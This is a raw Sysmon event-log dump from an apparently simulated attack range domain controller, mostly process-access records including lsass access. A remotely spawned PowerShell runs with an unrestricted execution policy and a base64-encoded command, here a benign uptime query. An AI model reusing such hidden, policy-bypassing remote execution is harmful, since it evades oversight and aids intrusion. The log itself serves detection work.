13:52:27.305{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000464Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000463Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000462Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000460Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-DB02-000000009001}3488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000459Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000458Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-851B-5FCF-DA02-000000009001}35804860C:\Windows\system32\cmd.exe{10ACEC4A-851B-5FCF-DB02-000000009001}3488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000457Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.309{10ACEC4A-851B-5FCF-DB02-000000009001}3488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-851B-5FCF-15E5-100000000000}0x10e5150HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-851B-5FCF-DA02-000000009001}3580C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000456Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000455Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-851B-5FCF-D902-000000009001}45203012C:\Windows\system32\conhost.exe{10ACEC4A-851B-5FCF-DA02-000000009001}3580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000454Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000453Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000452Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000451Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000450Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000449Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000447Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000446Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000445Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-DA02-000000009001}3580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000444Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-851B-5FCF-D802-000000009001}42524524C:\Windows\system32\WinrsHost.exe{10ACEC4A-851B-5FCF-DA02-000000009001}3580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000443Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.303{10ACEC4A-851B-5FCF-DA02-000000009001}3580C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-851B-5FCF-15E5-100000000000}0x10e5150HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-851B-5FCF-D802-000000009001}4252C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000442Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000441Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.290{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000440Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 